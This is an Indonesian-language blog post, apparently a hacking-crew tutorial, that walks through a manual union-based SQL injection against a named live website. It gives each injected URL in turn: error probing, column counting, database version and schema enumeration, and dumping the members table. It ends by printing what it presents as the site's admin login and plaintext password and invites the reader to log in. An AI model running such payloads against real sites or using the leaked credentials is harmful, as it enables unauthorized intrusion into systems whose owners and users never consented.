Target : http://www.natoleo.com/Content.php?id=14
1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com
muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)
2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')
http://www.natoleo.com/Content.php?id=14 order by 5--
jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)
3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--
akan muncul "angka ajaib" : 1
4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.
http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--
muncul tulisan :5.0.51a-community
5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--
muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,
category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,
forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,
kiteads_affiliates,kiteads_banners,kiteads_
cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,
kiteads_userlog,kiteads_zones,link_categories,l
inks,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,
pack_grp,pack_lists,package,products,users_group
,welcome
category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,
forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,
kiteads_affiliates,kiteads_banners,kiteads_
cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,
kiteads_userlog,kiteads_zones,link_categories,l
inks,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,
pack_grp,pack_lists,package,products,users_group
,welcome
6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--
muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_
email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,
member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,
website_url,club_status_id,member_date_added,security_level_id
email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,
member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,
website_url,club_status_id,member_date_added,security_level_id
kita ambil : member_login,member_password
7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL
ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--
hasilnya akan muncul:
user: wilmarnatoleo
pass: natoleoP@ssword
sekarang tinggal login ke website target..
By : arianom Kill-9 Crew
Sumber : http://kill-nines.blogspot.com/2010/12/manual-sql-injection-tutorial.html
0 comments:
Post a Comment